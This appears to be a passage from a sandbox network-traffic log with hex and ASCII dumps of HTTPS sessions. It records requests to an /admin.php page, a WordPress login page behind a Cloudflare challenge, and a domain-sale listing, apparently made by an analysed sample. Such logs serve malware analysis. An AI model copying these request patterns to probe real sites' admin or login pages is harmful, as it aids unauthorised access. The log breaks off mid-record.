2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 3a 23 30 30 37 63 62 61 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 30 2c 31 32 34 2c 31 38 36 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 3a 23 30 30 36 62 61 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 2d 2d 72 67 62 3a 30 2c 31 30 37 2c 31 36 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f Data Ascii: }</style><style id="wp-block-library-inline-css" type="text/css">:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,161;--wp-admin-theme-colo
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 33 33 30 39 36 38 2c 23 33 31 63 64 63 66 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 30 32 30 33 38 31 2c 23 32 38 37 34 66 63 29 7d 2e 68 61 73 2d 72 65 67 75 6c 61 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 36 32 35 65 6d 7d 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d 66 6f 6e 74 2d 73 Data Ascii: adient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-s
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d Data Ascii: er-right-color]){border-right-style:solid}html :where([style=border-bottom-color]){border-bottom-style:solid}html :where([style=border-left-color]){border-left-style:solid}html :where([style=border-width]){border-style:solid}html :where([style=border-
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 73 73 2f 77 74 2d 69 6d 70 6f 72 74 2d 65 78 70 6f 72 74 2d 66 6f 72 2d 77 6f 6f 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 31 2e 32 2e 34 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 77 73 2d 69 63 6f 6e 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 72 65 77 61 72 64 73 2f 61 73 73 65 74 73 2f 6c 77 73 2d 61 64 6d 69 6e 70 61 6e 65 6c 2f 73 74 79 6c 69 6e 67 2f 63 73 73 2f Data Ascii: ss/wt-import-export-for-woo-public.css?ver=1.2.4" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="lws-icons-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woorewards/assets/lws-adminpanel/styling/css/
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 72 6d 20 2e 6d 6e 6d 5f 69 74 65 6d 20 2e 62 6f 78 2d 74 65 78 74 20 2e 71 75 61 6e 74 69 74 79 20 2e 62 75 74 74 6f 6e 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 20 7d 0a 09 09 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 5b 64 61 74 61 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 5d 3a 6e 6f 74 28 2e 68 61 73 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 29 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 Data Ascii: rm .mnm_item .box-text .quantity .button { margin-top: 0; }</style><style id="dominant-color-styles-inline-css" type="text/css">img[data-dominant-color]:not(.has-transparency) { background-color: var(--dominant-color); }</style><link rel="styleshe
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 69 78 2d 61 6e 64 2d 6d 61 74 63 68 2d 70 72 6f 64 75 63 74 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 62 6c 6f 63 6b 73 2f 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 63 2d 70 62 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e Data Ascii: ix-and-match-products/assets/css/frontend/blocks/checkout-blocks.css?ver=1703001817" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="wc-pb-checkout-blocks-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugin

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.4	64658	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	327	OUT	GET /admin.php HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_MSd//wzs4hbD0hUxpzllzRXa/1shHWu5fsHx4wL/V8uRqFHRQP1bhKbhcYnQkAGCgRsogdLoATiI4ULGreFd8g Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:02 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.4	64753	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	286	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cannaclear.com/wp-login.php
2023-12-22 20:15:02 UTC	1343	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() cf-mitigated: challenge Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6CnCbxp12JZ07Wp58U5vjUjUb4Sek7QBa6j8CJxThHfNZ0746dtAiY6lRfem3TeCpSwezDjGJrrL7Tzf26h3uIRrfI5ruOQk%2FK9fDZq0XuBgoOW%2F1ZcQx%2FfJbPUi%2FVm5Kg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08d6b93274ae-MIA
2023-12-22 20:15:02 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 31 61 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 1a0f<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 76 57 32 70 56 5f 35 52 55 66 59 35 6a 49 77 6d 6e 36 45 2d 31 37 30 33 32 37 36 31 30 32 2d 31 2d 41 62 79 52 46 6d 4d 78 73 79 4e 75 4d 46 50 54 4b 65 5a 49 52 6c 51 72 31 79 6f 78 62 39 66 68 41 54 65 37 5f 35 55 4a 68 78 6b 48 41 32 57 63 68 72 42 65 57 70 64 73 64 50 42 67 4c 2d 77 70 7a 30 5a 32 6e 49 31 6f 78 70 4a 56 30 70 48 36 38 35 5a 70 37 30 6b 70 57 70 4f 73 35 58 54 33 2d 6e 47 6a 49 53 34 6c 78 49 36 73 54 43 66 65 71 4a 52 78 67 69 5a 66 33 5a 38 6b 65 30 55 75 2d 67 37 32 65 61 73 62 4e 6b 49 33 55 34 4a 5a 64 77 32 50 7a 52 6e 43 6d 53 6e 77 58 77 7a 74 45 79 33 70 4a 73 48 75 48 43 5a 69 78 55 6f 49 36 31 42 6f 2d 5a 52 66 35 30 6d 71 45 41 68 46 68 48 4a 6f 38 71 63 78 79 71 50 62 36 37 7a 51 71 69 55 76 58 54 35 66 4c 55 32 52 63 61 Data Ascii: vW2pV_5RUfY5jIwmn6E-1703276102-1-AbyRFmMxsyNuMFPTKeZIRlQr1yoxb9fhATe7_5UJhxkHA2WchrBeWpdsdPBgL-wpz0Z2nI1oxpJV0pH685Zp70kpWpOs5XT3-nGjIS4lxI6sTCfeqJRxgiZf3Z8ke0Uu-g72easbNkI3U4JZdw2PzRnCmSnwXwztEy3pJsHuHCZixUoI61Bo-ZRf50mqEAhFhHJo8qcxyqPb67zQqiUvXT5fLU2Rca
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 33 32 4c 2d 47 79 51 61 55 42 52 4d 39 4a 35 41 45 48 61 58 45 5a 5f 55 50 46 37 5f 38 75 36 44 42 54 67 47 79 5a 49 4d 75 52 4c 34 58 47 6d 33 57 69 4d 6f 44 4d 67 71 7a 42 65 41 62 36 53 4b 4a 38 56 78 74 78 6a 45 63 6d 56 5f 63 64 32 49 55 36 32 78 4c 6e 51 64 4a 72 79 59 38 65 57 38 77 4c 5a 39 6d 4c 5a 63 4a 4f 4b 73 6f 77 4a 55 69 73 52 57 46 55 32 64 77 6c 37 38 38 4b 5a 36 46 75 31 58 75 7a 43 72 68 4c 59 6c 76 30 4e 7a 43 4f 57 67 32 50 6a 54 41 31 6d 45 41 42 54 78 4e 2d 77 47 4c 34 41 4b 46 61 46 70 2d 6a 42 6b 64 5a 6d 44 4c 6e 35 6e 62 4b 62 54 6f 30 4e 6d 5f 4a 4c 34 53 58 55 75 6a 55 36 68 51 55 5f 4c 37 45 48 4a 65 6b 33 38 4d 67 4d 4f 33 41 45 62 64 48 53 4b 4b 61 7a 39 55 47 37 64 38 51 70 34 6c 59 72 62 64 6c 52 73 58 31 42 68 6d 51 62 Data Ascii: 32L-GyQaUBRM9J5AEHaXEZ_UPF7_8u6DBTgGyZIMuRL4XGm3WiMoDMgqzBeAb6SKJ8VxtxjEcmV_cd2IU62xLnQdJryY8eW8wLZ9mLZcJOKsowJUisRWFU2dwl788KZ6Fu1XuzCrhLYlv0NzCOWg2PjTA1mEABTxN-wGL4AKFaFp-jBkdZmDLn5nbKbTo0Nm_JL4SXUujU6hQU_L7EHJek38MgMO3AEbdHSKKaz9UG7d8Qp4lYrbdlRsX1BhmQb
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 64 64 6f 56 64 74 69 44 32 69 38 5f 55 52 4d 38 33 70 4d 4a 43 50 62 72 76 68 77 36 78 7a 64 4d 64 46 44 53 66 42 67 6b 67 4b 32 35 2d 4e 4a 49 53 4a 55 43 77 70 4d 30 50 61 43 45 63 6e 64 2d 71 75 63 6d 62 64 52 4f 66 51 4a 32 7a 39 2d 35 6b 6e 4b 33 50 46 55 62 34 4c 76 34 73 57 50 73 46 51 75 62 58 4a 70 6a 73 41 79 52 6e 73 61 47 36 2d 49 39 54 69 2d 62 54 31 51 47 79 55 6e 32 50 54 71 44 4c 46 55 6d 35 35 7a 4c 36 47 74 30 74 66 30 6f 52 6d 46 4b 6e 6b 39 5a 52 6b 43 36 54 56 43 7a 76 44 63 36 36 4f 44 52 35 46 44 6f 77 42 67 74 37 42 48 74 75 5a 7a 69 66 50 33 76 64 30 7a 41 2d 4f 51 65 70 7a 4c 75 6c 45 69 77 77 77 4c 4c 58 47 75 47 46 46 47 66 47 45 68 41 76 47 70 42 67 68 4c 6a 63 4d 42 36 36 6a 67 72 71 67 35 77 32 78 66 33 54 4f 50 73 46 41 69 Data Ascii: ddoVdtiD2i8_URM83pMJCPbrvhw6xzdMdFDSfBgkgK25-NJISJUCwpM0PaCEcnd-qucmbdROfQJ2z9-5knK3PFUb4Lv4sWPsFQubXJpjsAyRnsaG6-I9Ti-bT1QGyUn2PTqDLFUm55zL6Gt0tf0oRmFKnk9ZRkC6TVCzvDc66ODR5FDowBgt7BHtuZzifP3vd0zA-OQepzLulEiwwwLLXGuGFFGfGEhAvGpBghLjcMB66jgrqg5w2xf3TOPsFAi
2023-12-22 20:15:02 UTC	1203	IN	Data Raw: 54 63 53 59 47 42 4b 66 4b 55 69 75 50 79 51 69 42 59 44 57 33 69 73 6f 4c 75 5a 4a 42 54 42 78 33 41 3d 27 2c 69 31 3a 20 27 65 75 70 64 45 73 59 45 50 39 30 43 36 31 2b 55 54 69 67 4d 6c 51 3d 3d 27 2c 69 32 3a 20 27 4a 31 56 49 39 65 62 73 42 6a 48 4b 70 42 78 71 2f 51 43 69 53 67 3d 3d 27 2c 7a 68 3a 20 27 75 71 69 72 30 2b 4e 47 35 41 77 37 53 73 38 6b 7a 68 55 7a 45 4b 48 78 45 31 6c 46 65 58 48 30 35 6a 7a 41 55 42 58 36 32 34 30 3d 27 2c 75 68 3a 20 27 66 6a 56 4a 58 72 54 59 2b 4c 78 30 7a 65 74 56 79 2f 42 72 64 6a 6f 51 68 6e 65 59 49 62 36 69 4b 39 46 6c 2f 76 58 6d 42 6f 73 3d 27 2c 68 68 3a 20 27 77 5a 4d 71 61 44 45 64 32 33 2b 47 58 70 48 73 63 42 4d 72 56 4e 36 4a 4c 53 65 45 43 4e 2b 47 6a 47 6d 6a 72 36 37 5a 47 34 67 3d 27 2c 7d 7d 3b Data Ascii: TcSYGBKfKUiuPyQiBYDW3isoLuZJBTBx3A=',i1: 'eupdEsYEP90C61+UTigMlQ==',i2: 'J1VI9ebsBjHKpBxq/QCiSg==',zh: 'uqir0+NG5Aw7Ss8kzhUzEKHxE1lFeXH05jzAUBX6240=',uh: 'fjVJXrTY+Lx0zetVy/BrdjoQhneYIb6iK9Fl/vXmBos=',hh: 'wZMqaDEd23+GXpHscBMrVN6JLSeECN+GjGmjr67ZG4g=',}};
2023-12-22 20:15:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.4	64763	104.26.6.37	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	796	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:02 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:02 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QZMCsUFElAeZ6Gye5rw6FWkNXZCmvax4YiUm5BYHKZHbSfsG%2F3ENiezWO%2FSGKK3mSX5znGqLXYq2PE5gRgMYkB7kUO94YhDXN%2F7RG0EeE18RKfkns4eDaFM5UZXMkMXyKUZXv5g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08d6cbf674a4-MIA
2023-12-22 20:15:02 UTC	573	IN	Data Raw: 39 32 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 Data Ascii: 92f<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f Data Ascii: <link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/
2023-12-22 20:15:02 UTC	416	IN	Data Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 Data Ascii: el="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 31 31 34 64 0d 0a 70 61 67 65 4c 6f 61 64 27 2c 20 7b 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 3a 20 27 48 44 76 33 27 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 6d 61 69 6e 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 68 64 76 33 48 65 61 64 65 72 44 61 72 6b 42 6c 75 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 2d 6f 76 65 72 6c 61 79 2d 6d 6f 64 61 6c 20 6f 76 65 72 6c 61 79 2d 6d 6f 64 61 6c 22 